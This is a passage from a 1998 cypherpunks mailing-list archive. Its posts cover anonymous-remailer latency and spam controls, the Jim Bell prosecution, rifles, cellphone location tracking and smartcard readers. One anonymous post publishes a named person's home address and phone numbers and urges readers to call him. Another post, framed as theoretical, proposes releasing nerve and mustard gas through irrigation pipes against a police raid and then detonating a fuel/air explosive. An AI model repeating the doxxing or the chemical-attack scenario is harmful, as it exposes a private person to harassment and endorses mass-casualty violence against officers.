scenario above on cracker, the odds of any given message being cycled out
of the pool (the pool is processed at six minute intervals) is generally
50% per cycle. Thus, there is a 75% chance that it has been sent by the
end of the second cycle, and therefore a 25% (.5*.5) chance that it is
still in the queue. The current RMS latency (from the remailer's own
stats) is 19.5 minutes. You want to about double that to be sure that the
message has really come out (and then, you still can't be sure), so that's
about six cycles. If we are doing 5 per cycle, then the odds are 1 in 30. 
A very rough estimate.  However, by my estimates, it's more like 12
messages per cycle (typically; it's variable for the reasons above), so
that runs it up to 1 in 72 or so.

(And of course, the remixing ensures that all messages are
indistinquishable, whenever possible.)

> What I'm unclear on is how setting a Latency:  flag affects the
> diffusion of the output.  Is that lattency IN ADDITION to the pool
> size of five, or does Latency:  +00:00 bypass the reordering process
> altogether?

Latency occurs before reordering. Latency: +00:00 does nothing, BTW, and
it's the default. Latency: +12:00r adds a 0-12 hour random delay before
reordering.

> My main concern is the security of chained reply blocks which are
> more vulnerable to attack than normal anonymous messages.  A single
> anonymous message can only be traced BACKWARDS after it's been
> received.

Which is probably not so hard when you record all inter-remailer traffic,
which is probably what happens somewhere.

>  An anonymous reply, OTOH, could, theoretically, be
> "walked" through each remailer in the chain until the identity of
> the recipient was discovered.  While that process would require
> convincing each remailer operator in the chain to cooperate, it's a
> lot more feasible than tracing a message backwards to its source.
> (Yes, I know about posting to a public message pool, such as a.a.m,
> but NG posting seems to be rather unreliable lately.)

Yep, that was part of the motivation for remixing: To keep eavesdroppers
from intercepting partially-decrypted reply blocks. It also prevents
traffic analysis based on the message section after the reply block. Reply
blocks, of course, tend to get smaller after each hop, while the message
getting delivered tends to get larger. Automatically encapsuling type-I
messages in type-II format whenever the recipient supports it prevents
this type of traffic analysis.

Andy Dustman / Computational Center for Molecular Structure and Design
For a great anti-spam procmail recipe, send me mail with subject "spam".
Append "+spamsucks" to my username to ensure delivery.  KeyID=0xC72F3F1D
Encryption is too important to leave to the government. -- Bruce Schneier
http://www.athens.net/~dustman mailto:andy@neptune.chem.uga.edu   <}+++<


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3ia
Charset: noconv

iQEPAwUBNK77/BOPBZTHLz8dAQHlRwfPY/0uPyFXIgQxGAFt+kbNT85lZ9/Bf9B6
XIoRHARSbE0np2JB7kB0PdjXIxgyFoxcn9kuTyspOgFgF80zQjFR7RYSQC8QKXDV
1dnod7X4ynrvjmHbGtfOYDfgZSKUboTrwIPuehfUw3IDnDliVjDnnDy76f4uZdLc
+Jn4JGRGPqVBQ3EX2d0yxDsIXY88geeGa4xgzSMSEaXWW+AoNw19mNJRA0AehiLg
DZRDHKbCKYRtqt9aOn1h3qi3VrOqUjkO8awBkSQw84ycEqVaBgczBW/nBtNIpHq5
42pHjHpCc1riYY/2vuOXXD3juou1Th4By7JaZLwt+GkbZA==
=r/Dk
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 4 Jan 1998 05:32:32 +0800
To: cypherpunks@toad.com
Subject: Dimitry "The Hair" Vulis
Message-ID: <199801032116.WAA06540@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain




Poor Dimitry! He can dish it out, but not take it.

Everyone should give Dimitry a call and tell him
how much he is appreciated.

Dr. Dimitry Vulis's home phone number:

Vulis, Dimitri (DV1006)         postmaster@DM.COM
   D&M Consulting Services Inc.
   67-67 Burns Street
   Forest Hills, NY 11375
   718-261-6839 (FAX) 212-725-0693

The 212 number is goes directly into his
home 718 (Brooklyn) house, and is answered
by a person.

Talk with the devil himself!

---simvlad





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan <alan@clueserver.org>
Date: Sun, 4 Jan 1998 15:39:21 +0800
To: "Brian B. Riley" <brianbr@together.net>
Subject: Re: Guns: H&K, G3, 7.62 v 5.56 [Guns] (fwd)
In-Reply-To: <199801032150.QAA29689@mx02.together.net>
Message-ID: <3.0.5.32.19980103231222.036b7b90@ctrl-alt-del.com>
MIME-Version: 1.0
Content-Type: text/plain



At 04:50 PM 1/3/98 -0500, Brian B. Riley wrote:

>  There may be .50-cal bolt actions out there that are one man
>carries, but the Barrett gun is a three man load. The gun is 57 inches
>long and weighs 32.5 pounds, unloaded with no scope. The primary
>mission of the gun is not man sniping, though I am sure it often has
>been and will be used in that role, but its main aim is to long range
>snipe and disable antennae, dishes, equipment, etc using the AP and
>API ammunition.

When I lived in Alaska I knew someone who built such a thing for hunting
bears. I never got to fire it, but it was supposed to have a kick like a
mule. (Even with the shock absorbing stock.)

The hardest part is getting the 50 cal ammo.  (He had his Federal firearms
license and was in the National Guard, so it was not too difficult for
him.) Getting AP and other special ammo would be doubly difficult.
(Non-specialty ammo could be reloaded as long as you could get molds and
primer caps.) 

I guess it depends on your military and/or black market connections.

---
|              "That'll make it hot for them!" - Guy Grand               |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.ctrl-alt-del.com/~alan/       |alan@ctrl-alt-del.com|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joab Jackson <joabj@charm.net>
Date: Mon, 5 Jan 1998 12:42:05 +0800
To: cypherpunks@toad.com
Subject: Baltimore City Paper editorial on Jim Bell
Message-ID: <3.0.3.32.19980103232529.007b81f0@mailhost.charm.net>
MIME-Version: 1.0
Content-Type: text/plain





A Bridge Too Far?

----------------------------------------------------------------------------
----


No doubt about it, Jim Bell disliked the government. As far as this
Vancouver, Wash., resident was concerned, there isn't any problem with
Congress that $60 worth of bullets couldn't solve. And he let his opinion
be known in newsgroups, mailing lists, and, perhaps most notoriously,
through an essay he wrote and promoted on the Internet called
"Assassination Politics". 

But did Bell-who, federal authorities discovered, had an arsenal of deadly
chemicals and firearms and the home addresses of more than 100 government
workers-have a plan to murder public employees? 

"What was interesting is that the whole case was based on whether he'd be
harmful in the future. He hadn't actually hurt anyone, but he was talking
about some scary stuff," John Branton, a reporter who covered the Bell case
for the southern Washington newspaper The Columbian (The Jim Bell Story),
told me by phone. 

On Dec. 12, Bell, 39, was sentenced to 11 months in prison and three years
of supervised probation after pleading guilty to using false Social
Security numbers and setting a stink bomb off at a local Internal Revenue
Service office. But authorities acknowledge those charges weren't what his
arrest was really about. 

"We chose not to wait until he followed through on what we believe were
plans to assassinate government employees," Jeffrey Gordon, an IRS
inspector, told the Portland, Ore., daily The Oregonian. Gordon likened
Bell to convicted Oklahoma City bomber Timothy McVeigh and Unabomber
suspect Theodore Kaczynski. The federal government's court filing against
Bell stated the belief that the defendant had a plan to "overthrow the U.S.
government." Proof of his motivation, the government asserted, was found in
Bell's Internet writings: "Bell has spelled out parts of his overall plan
in his 'Assassination Politics' essay." 

Bell wasn't lacking for firepower. On April 1, 20 armed federal agents
raided Bell's home, where he lived with his parents. According to U.S. News
& World Report ("Terrorism's Next Wave") the feds found three semiautomatic
assault rifles; a handgun; a copy of the book The Terrorist's Handbook; the
home addresses of more than 100 government workers; and a garage full of
potentially deadly chemicals. Authorities had long known that Bell was a
spokesperson for a local libertarian militia and was involved in a
so-called "common-law court" that planned "trials" of IRS employees. 

Given what the feds found at the house, in retrospect the raid seems
prudent-as Leroy Loiselle of the U.S. Environmental Protection Agency told
U.S. News, "You don't need nitric acid to keep aphids off your flowers."
It's easy to forget the troubling fact that the government's initial reason
for raiding Bell's residence was "Assassination Politics," which they found
in Bell's car when the IRS seized it back in February. (Bell owed some
$30,000 in back taxes.) Will others who make public their wrath for
government and owe some taxes to Uncle Sam be paid similar visits? 

What's perhaps more troubling still is the way the feds held up Bell's
essay as evidence of his violent intent. Reading "Assassination Politics"
makes clear that it is no more a workable blueprint for overthrowing the
government than Frank Herbert's Dune is a realistic plan for urban renewal.
For about two years prior to Bell's arrest, "Assassination Politics"
floated around the Internet. Bell, for instance, sent this essay out on the
cypherpunks mailing list, where scenarios for the future, based on new
technology and libertarian principles, are frequently discussed. None of
the cypherpunks took his "plan" seriously then. 

The core of "Assassination Politics" is a plan to establish an anonymous
electronic market wherein people could "wager" money on when public
individuals, be they world leaders or corrupt tax collectors, will die. A
person (say, for instance, an assassin) who correctly "predicts" the day of
a death could anonymously collect the "winnings." Far from being a direct
call to arms, Bell's essay is largely hypothetical, at least until
encryption, traceless digital cash, and mass homicidal hatred of world
leaders becomes widespread. Ugly yes; realistic no. 

"I've told Jim Bell on any number of occasions that it would never work,"
Robert East, a friend of Bell's, tells me by e-mail. "If Jim had properly
titled this as a fictional piece of literature he'd have been far more
accurate." 

In April, when the Jim Bell story broke, both The Columbian and Time
Warner's Netly News portrayed Bell as a victim whose free-speech rights
were violated. But as evidence against Bell piled up, the sympathy muted
considerably. U.S. News' recent cover story on domestic terrorism,
"Terrorism's Next Wave," opened with the Bell case. 

Perhaps Bell was prosecuted for what he wrote rather than what he might do.
(Both friends and family have repeatedly said Bell, though a big talker,
isn't much of a doer. "Jim is a harmless academic [n]erd," East insists.
"I've known him for years and he's harmless.") Perhaps the IRS was spooked
by little more than idle speculation of its demise. But the evidence seems
to have dealt the feds the better hand, and lends credence to the idea
that, for all the protest of free-speech advocates, words are not always
separable from actions. 


----------------------------------------------------------------------------
---------------
The Baltimore City Paper:                      
http://www.citypaper.com                      

City Paper's  Cyberpunk column:
http://www.citypaper.com/columns/framecyb.htm

Archives:
http://www.charm.net/~joabj/

joabj@charm.net                             
410.356.6274
                                         

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 5.0
mQBtAzJFsfEAAAEDAOtSe/7TU8y0ZYBFXp8c6hxwzDIdbIsDtTsvKx2X
v5S65Mdc3vCEFhMuwxceatO4T5IKgBFWJ2r7s9fFKtsAIS4vKCESi+wY7j
5rEZ6oYbaeWlj1yfwjAjg8SUxCjuji1QAFEbQeSm9hYiBKYWNrc29uIDxqb2
FiakBjaGFybS5uZXQ+ =ttEP
-----END PGP PUBLIC KEY BLOCK-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc <blancw@cnw.com>
Date: Sun, 4 Jan 1998 18:00:15 +0800
To: cypherpunks@cyberpass.net
Subject: MS: "Setting the Record Straight"
Message-ID: <3.0.32.19980104011838.006a2b20@cnw.com>
MIME-Version: 1.0
Content-Type: text/plain



For any of you who haven't already searched for & found this:

http://www.microsoft.com/corpinfo/myths.htm


    ..
Blanc





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@nsm.htp.org
Date: Sun, 4 Jan 1998 10:15:50 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Microsoft
Message-ID: <19980104020914.26009.qmail@nsm.htp.org>
MIME-Version: 1.0
Content-Type: text/plain



At 02:25 98/01/04 +0100, Anonymous wrote:
> Windows is still fucking me up the ass! I'm bleeding to death here!
> 
> 
> 

For relief, see: http://www.enemy.org/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@REPLAY.COM>
Date: Sun, 4 Jan 1998 09:45:01 +0800
To: cypherpunks@Algebra.COM
Subject: Microsoft
Message-ID: <199801040125.CAA09309@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Windows is still fucking me up the ass! I'm bleeding to death here!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@cypherpunks.to>
Date: Sun, 4 Jan 1998 10:26:56 +0800
To: Ryan Lackey <rdl@mit.edu>
Subject: Re: Guns: H&K, G3, 7.62 v 5.56 [Guns] (fwd)
In-Reply-To: <tw77m8hi7zs.fsf@the-great-machine.mit.edu>
Message-ID: <Pine.BSF.3.96.980104030244.4869B-100000@pakastelohi.cypherpunks.to>
MIME-Version: 1.0
Content-Type: text/plain



On 3 Jan 1998, Ryan Lackey wrote:
> It would be interesting to fit one's house with speakers/noise generators/
> flash generators/smoke/etc. to make it look as if one has an automatic
> cannon or a small army, in response to a raid.  It would make a perfect
> distraction during which to leave :)

[The following is a theoretical discusion. Do not try this at home].

What you really want is the ability to slow down the mobility of the raid
force while making your exit. In a prolonged siege, the attacker will
always win.  A good way of slowing down the attacker after an initial
armed response is to deploy chemicals. A combination of Tabun and Mustard
Gas works best, but don't deploy them at the same time. Use the Tabun
first for maximium impact. Follow up with the Mustard Gas a few minutes
later. The underground irrigation systems common on California properties
are ideal means of gas deployment. You should be able to retrofit the
system for under $500. Assuming you already have the gas. Of course you
need to make sure to keep a chem suit at home. 

After you make your exit, you can clean out the next with a previously
installed fuel/air explosive. 

-- Lucky Green <shamrock@cypherpunks.to> PGP v5 encrypted email preferred.
   "Tonga? Where the hell is Tonga? They have Cypherpunks there?"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kay Ping <kping@nym.alias.net>
Date: Sun, 4 Jan 1998 16:48:42 +0800
To: cypherpunks@toad.com
Subject: Re: Location Escrow anyone ?
Message-ID: <19980104083939.14929.qmail@nym.alias.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

> The FCC may have ruled it, but its doubtful that the carriers can provide
>  it.  Doing better than than a cell sector will depend on many factors,
>  including: specific technology (analog, GSM, CDMA, etc.), frequency and
>  local propagation characteristics, especially multipath conditions.

The FCC ruling is a result of lobbying by a company that has actually built such a  location device. The requirements are tailored to the capabilities of their device and they probably expect to automatically win the contracts.  I don't remember their name but the devices need to be installed in about one out of 3 cellular base stations. 

I am only guessing now, but it's not unlikely that they have been assisted in their lobbying efforts by certain three-letter-acronym agencies. They knew that the goverment would look favorably on a device to track people and would eagerly buy their excuse of 911 caller location.

- -----------------
Kay Ping 
nop 'til you drop

finger kping@nym.alias.net for key
DF 6D 91 18 A6 59 41 96 - 89 01 69 B7 9D0 4 AE 53

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3ia
Charset: cp850

iQEQAwUBNK8o/BHPAso8Qp7tAQFGfgfRAQUYARi6dQYIWyehqBhXMhyvgfYkWN2X
rDDkE/bCr4yfvuYA5e/H3kVhfEh9TXT2m4+F6NmWPmy5WM6s5yuDR3I5t/3EDH8T
uHV/EfkhjiE0HiQgTLB19VGFRXoi9eLlnBaxBcZZK8dknJ/T7rFlthvpUeL3crVl
yD0Swl7lYgeyuG2HLgOLc5v+ej1tDdI27KIjoBj/dCDSoN6gtzj/linCLbjY8NZZ
akY3cQbk3QVrXfJamX+n6X3cwKkI20phrM5DBjh1pdhod6nLvRDPiEkT3prqRTx7
gjrJip/pzCKABUmkWSigXFgQARvkPW6ZqSCnoCSivzgYFxE=
=UcO3
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Mon, 5 Jan 1998 02:07:01 +0800
To: cypherpunks@Algebra.COM
Subject: My last comment (for now) on rifles
Message-ID: <v03102802b0d57f3cff2c@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 11:12 PM -0800 1/3/98, Alan wrote:

>When I lived in Alaska I knew someone who built such a thing for hunting
>bears. I never got to fire it, but it was supposed to have a kick like a
>mule. (Even with the shock absorbing stock.)
>
>The hardest part is getting the 50 cal ammo.  (He had his Federal firearms
>license and was in the National Guard, so it was not too difficult for
>him.) Getting AP and other special ammo would be doubly difficult.
>(Non-specialty ammo could be reloaded as long as you could get molds and
>primer caps.)
>
>I guess it depends on your military and/or black market connections.

You must be thinking of some other (larger) caliber, as .50 BMG is readily
available. At my local gun shop, $3 a round. (It may be cheaper elsewhere.)
A gun shop over in Silicon Valley was selling a belt-fed, semi-automatic
.50 BMG for about $7K, if I recall the ad correctly. They were selling
shots with it for $5 a shot, and advertising it as "Diane Feinstein's Worst
Nightmare."

.50 caliber is the largest readily available caliber (Uncle has limited
larger calibers only for His own use, not for the use of the Rabble.)

And there are several .50 BMG rifles readily for sale, mostly ranging from
$3000 to $6000. The Barrett is the most commonly talked about version.

Personally, I can't see the point of a .50, even for hunting bear. (Not
that I would _want_ to hunt bears, as I find bears preferable to most
humans, by far.) A .300 Winchester Magnum, a .375 H&H, or a .338 Lapua
Magnum should be more than enough, and a whole lot cheaper than a Barrett
or somesuch.

The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Mon, 5 Jan 1998 04:35:45 +0800
To: cypherpunks@cyberpass.net
Subject: BOOK: Forthcoming - J Gray, _Hayek on Liberty 3rd edition_
Message-ID: <v04003900b0d55eeed34e@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Date:         Sat, 3 Jan 1998 13:34:30 EST
Reply-To: Hayek Related Research <HAYEK-L@MAELSTROM.STJOHNS.EDU>
Sender: Hayek Related Research <HAYEK-L@MAELSTROM.STJOHNS.EDU>
From: Gregransom <Gregransom@AOL.COM>
Organization: AOL (http://www.aol.com)
Subject:      BOOK: Forthcoming - J Gray, _Hayek on Liberty 3rd edition_
To: HAYEK-L@MAELSTROM.STJOHNS.EDU

>>  Hayek Web  <<

Routledge -- Hayek's publisher in England and on the Continent of Europe,
on the Web at:

http://www.routledge.com/

>From the Routledge Web site:

"_Hayek on Liberty Third Edition_

John Gray, Jesus College, University of Oxford

Published by Routledge
Pb
ISBN/ISSN: 0-415-17315-9

>From the previous edition: ...

"In Hayek on Liberty John Gray treats Hayek primarily as a philosopher. His
book is analytical, not hagiographical, and almost certainly the best book on
the subject.' - Samuel Brittan, Financial Times

'The most generally accessible book on Hayek so far.' - Anthony Quinton,
Times Higher Education Supplement
...

Hayek's achievements in social and political philosophy are increasingly
receiving full recognition. _Hayek on Liberty 3rd Edition_ is a concise yet
exhaustive and provoking study of this classic liberal philosopher which
examines the structure and impact of his system of ideas and locates his
position within Western philosophy. Not available since the 1980s this
up-dated 3rd edition contains a postscript which assesses how far the
historical developments of the last ten years can be deployed in a critique
of Hayek's thought. This book will contribute to a much needed wider
debate on the future of conservatism.

192 pages
Dimensions: 5 1/2 x 8 1/2 inches; 216 x 138 mm
Status: Coming Soon"


Hayek on the Web is a regular feature of the Hayek-L list.

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/
Ask me about FC98 in Anguilla!: <http://www.fc98.ai/>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brian B. Riley" <brianbr@together.net>
Date: Sun, 4 Jan 1998 23:54:43 +0800
To: "Al KC2PB" <cypherpunks@Algebra.COM>
Subject: Fwd: Yup
Message-ID: <199801041548.KAA21685@mx02.together.net>
MIME-Version: 1.0
Content-Type: text/plain




---------------- Begin Forwarded Message ----------------
Date:        01/03  10:00 AM
Received:    01/04  10:37 AM
From:        Bruce Alan Johnson, baj@sover.net
To:          Brian B. Riley, brianbr@together.net

MISTAKEN IDENTITY: Police in Bangkok, Thailand, arrested an American
  tourist who climbed repair scaffolding to the top of Wat Arun (Temple
  of the Dawn) and refused to come down. After 10 hours, the man was
  subdued by police and turned over to the American Embassy. He
  identified himself as God, but officials determined he was Brandon
  Simcock, 27, an employee of Microsoft. (Bangkok Post) ..."Termination
  Notice. Reason for Termination: Impersonating CEO."






----------------- End Forwarded Message -----------------

Brian B. Riley --> http://members.macconnect.com/~brianbr
 For PGP Keys  <mailto:brianbr@together.net?subject=Get%20PGP%20Key>

 "Journeys are about discovery, about lives touching briefly and then 
parting,
  except on the Internet, where distant lives can intertwine, and where a 
  journey of discovery never has to end." -- 	Jim Heid






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Mon, 5 Jan 1998 04:16:27 +0800
To: remailer-operators@anon.lcs.mit.edu
Subject: PGP-out-only vs. hashcash aware remailers?
In-Reply-To: <Pine.LNX.3.95.971230173406.22460A-100000@privacynb.ml.org>
Message-ID: <3.0.3.32.19980104120940.00722cdc@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 05:40 PM 12/30/1997 -0400, Privacy Admin <woz@privacynb.ml.org> wrote:
>Since I've switched to type-I pgponly remailer I haven't had a problem
>with spammers. I've been wondering if hashcash makes sense for remailers,
>or [only] for mail2news gateways. 
>
>I guess I am looking for any means of controlling spammers using remailers
>and mail2news gateways.

Hashcash won't help mail2news, except by discouraging dumb spammers,
because news spam only needs a few messages.
PGP-only input will cut down on most spammers, though you'll still get 
a few, especially if they're spamming mailing lists (which makes the 
encryption both worth the effort and useful for safety.)

If you modify your remailer to only _output_ PGP-encrypted messages,
you get hashcash-equivalence, and cut abuse substantially.
The cost is limiting recipients to pgp users (plus known exceptions),
but it's tough to spam people when you need to look up their PGP key
and encrypt to it (at least you'll only get spams for high-tech stuff),
and it's tougher for random abusers to abuse people since most targets
don't have PGP keys, and a mailbox full of PGP junk is less annoying
to most people than a mailbox full of human-readable hate mail.
In particular, it's harder to send death threats to politicians
if they don't have published PGP keys.

Is this a feature that makes sense?

PGP-out-only remailers aren't as useful for anonymous tip lines
(unless the tip line has a PGP address.)  
They're not as useful for inviting new people into your conspiracy, 
though they're fine for conspiring with people whose keys you already know 
(and they can be unlisted keys only used for the conspiracy.)
If the Bank of Caribbean Cash Importers is interested in taking
anonymous clients who contact them through remailers, they've 
probably got a PGP key handy to send to anyway.
They're not transparently useful for mail2news, but the remailer
could make exceptions for known mail2news sites, or could ignore
the problem, which is fine for posting to alt.anonymous.messages,
though not for posting to alt.whistleblowers.

How would you implement it?
Obviously you'd need to allow some unencrypted lines at the beginning,
at least if they have remailer syntax( ::, ##, mail headers, etc.).
Do you cut all lines after the "-----END PGP"?  My first impression was
yes, but after reading the Freedom Remailer source, it looks like
this might kill messages using encrypted reply blocks, so maybe not.
Detecting the PGP itself can be crude ("----- BEGIN PGP ENCRYPTED"...)
or can be a bit fancier (make sure the lines are all the right length
and limited to the correct character set), 
or much fancier (de-armor and look for PGP blocks).

Even the fancy approaches can be spoofed, since you can't go very
deep into the headers without the right keys, so a couple lines of
real PGP material could be included, leaving possibilities like
	::
	Request-Remailing-To: Your Mama
	##
	Subject: My Guitar Wants to Kill Your Mama
	-----BEGIN PGP MESSAGE-----
	Version: PGP for Personal Privacy 5.0
	Comment: PGP allows arbitrary comments, so Decrypt This!

	hQCMAynIuJ1VakpnAQP+MWng0I6TnDf/U83KCttjYZQSnPQjS59rw+M+iSmTGLIs
	btqW5hn1HXheSb8GNifAWz2rqgdH3GqjZ5rRBDF5tZfQfV5kNNYE1XpT/CMgAsDh
	3IkaeOumDKXON+8acl5X7NToSjml+mkxkF7kE9u5oxCEXErDjS3k2wOtv0krNfSk
	HeyChelseaaaaaaaaaaaaaaaaaaBWAHAHHAHAHAHAHAHAHAHAHHAHAHAHAHAHAHA
	MyGuitarWantsToKillYourMamaBWAHAHHAHAHAHAHAHAHAHAHHAHAHAHAHAHAHA
	MyGuitarWantsToKillYourMamaBWAHAHHAHAHAHAHAHAHAHAHHAHAHAHAHAHAHA
	MyGuitarWantsToKillYourMamaBWAHAHHAHAHAHAHAHAHAHAHHAHAHAHAHAHAHA
	-----END PGP MESSAGE-----
	and your little dog, too!


But at least it's a start.
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Mon, 5 Jan 1998 07:51:47 +0800
To: cypherpunks@toad.com
Subject: rant on the morality of confidentiality
Message-ID: <199801042341.PAA26750@netcom5.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



I posted this to PM's mailing list, but he apparently zapped it
without comment. so here it goes to a less authoritarian
forum. context: posters to his list were remarking on the
recent declassification of information in Britain that suggested
they had discovered the key aspects of RSA before it was
discovered in the open literature by Diffie & Hellman etc.


------- Forwarded Message

To: cryptography@c2.net
Subject: a rant on the morality of confidentiality



scientists who agree to government secrecy to develop
their inventions are agreeing to a lot more than 
mere secrecy. they are committing to a paradigm that
is at odds with science itself, which only advances through
the open literature.

furthermore, they are giving away their power, so to speak,
to governments that do not have the same motives they do.
essentially they are working for a war machine, or a 
suppression machine. how can they be sure their inventions
will not be used for dark purposes? imho, by not working
within a system that poses that risk. that no such system
seems to exist is irrelevant. a truly responsible scientist
would help create one and wouldn't work without one.

I think the scientists who worked on the atom bomb and today
within the NSA are working under a key false assumption. "if we
don't develop it, the enemy will, and he will use it
against us". but perhaps if scientists around the world
united against the government warmongers that have been
manipulating them for many generations, particularly 
within the 20th century with grotesque results, perhaps
a different story would emerge. yet even Einstein himself
urged our government to "develop a weapon of mass 
destruction before the Joneses do". how smart is that?
perhaps scientifically clever, but morally, socially, and
spiritually vacuous. 

it is a feeble mind in my opinion who
takes refuge in the saying that "technology is neutral".
perhaps so, but not the humans who use and *develop* it,
and the latter are particularly responsible for the former.

how smart were those nuclear weapons scientists, anyway,
such as Feynmann? imho they agreed to the terms of their
own manipulation, and failed to question their basic
motives and intents and of those who paid them.

I believe those that work within the NSA and other secret
agencies are betraying the principles of science under the
guise of protecting humanity. I believe they have the
power to change this system, but they have reneged on their
responsibility as human beings.

Wayner covers the simplistic issues in his piece for the
NYT, but they key issues at stake are far deeper and have
never even been recognized by some of the so-called
greatest minds of our century.

so I view with distaste, to say the lest,
the scientists who later try to break the 
secrecy and come out in the open merely so that
they can have credit for something that was classified
they claim to deserve.  they deserve
credit only for supporting and participating in a vast 
and sinister system of scientific manipulation for dark 
and inhumanitarian purposes.

Chomsky is one of the few scientists of our time who
has the brilliance to recognize the ulterior side of the government
we support. surprise! he is largely ignored or even
blacklisted by his morally- and socially- handicapped colleages
who believe it is not their place to question the status
quo, but only to fit into it or advance through it.

all those scientists who have ever complained about the
lack of funding for your branch, or who have fought with
each other over the scraps handed to you like dogs--
do you have any concept of how much tax money is put into
military research? how much is funnelled into the NSA?
this is money that is funded by the public for public
welfare-- is it really being used for that?

NSA and other secret agencies have become vast parasites
feeding on public dollars that have no accountability, and
largely because scientists, who should lead the pack, instead
lack the intelligence to recognize it or the courage to challenge it.

these are my thoughts as I read how the NSA's Inman pops
up to say that the credit for RSA is the NSA's, or a British
agency does the same.

secrecy is directly contradictory to the principles upon
which this country is founded. and imho it is becoming a large
source of its ongoing demise.

quite simply, the scientists are fiddling while Democracy burns.



------- End of Forwarded Message





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Secret Squirrel <anon@squirrel.owl.de>
Date: Mon, 5 Jan 1998 02:53:27 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Microsoft
Message-ID: <186eae90d0afdcd691326a13f1ad8b66@squirrel>
MIME-Version: 1.0
Content-Type: text/plain



>At 02:25 AM 1/4/98 +0100, Anonymous wrote:
>>
>>Windows is still fucking me up the ass! I'm bleeding to death here!
>
>Then get a copy of Linux and stop whining!
>
>Sheesh!

Usually when somebody says something like that they're refering more to
Microsoft indirectly borking them. For instance, people send around MS Turd
documents. You have to buy MS Turd. Some Windows lamers send out HTML email.
Many (most?) are clueless on USENET. Many (most?) don't like to type at all,
and choke and die when they get into an environment where they have to.
People walk into computer labs and are stuck with the pathetic environment
that is Windows. And this doesn't even count the "Everyone is running
Windows" and "Everything is da web" folks.

It wouldn't be so bad if there was full source to everything and it didn't
cost an arm and a leg, or if it didn't suck. But there isn't, it does, and
that's putting it mildly.

I can hear the cries of "You're anti-business!" and "You're just a UNIX
weenie!" already. I just remember back when the average net user had
somewhat of a clue. When the network went "to the masses" and people went
out of their way to make it point and click the drooling lemmings were
attracted to it. And of course where the drooling lemmings go the people who
take advantage of the drooling lemmings follow, e.g. spammers.

My attitude about this pretty much went down the toilet when I was called a
"UNIX weenie" because I suggested that a Windows user deliver his own mail
while the ISP's SMTP server was down. Then of course the Windows flamer
decided to start denouncing the very notion of RFCs, then started rambling
about POP3 and IMAP. And of course I implied "that we all run UNIX" because
I used the word "daemon" -- yeah, apparently Windows is so bad that this
user didn't even know it *could* run background processes.

No, I wasn't the original writer, but I see where the original author was
coming from...I think. Yes, I use Linux. Yes, I remember MAKE.MONEY.FAST but
it was nothing like the spam we get today and was few and far between.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@cypherpunks.to>
Date: Sun, 4 Jan 1998 23:32:35 +0800
To: cypherpunks@Algebra.COM
Subject: Smartcard readers
Message-ID: <Pine.BSF.3.96.980104161855.5731A-100000@pakastelohi.cypherpunks.to>
MIME-Version: 1.0
Content-Type: text/plain



Several people inquired about obtaining one of the universal smartcard
readers the Cypherpunks Smartcard Developer Association built in the past.
As our knowledge about commercial readers  increased, we were able to add
support for commercial readers from several manufacturers such as Gemplus,
Schlumberger, and Philips. Therefore, there is no need to for another
production run of our own reader. If you wonder which reader to buy, I
like the Gemplus best. If you have a reader we don't already support, send
me a sample and we'll add it.

Our smartcard software is at https://www.cypherpunks.to/scard/

Have fun,
-- Lucky Green <shamrock@cypherpunks.to> PGP v5 encrypted email preferred.
   "Tonga? Where the hell is Tonga? They have Cypherpunks there?"





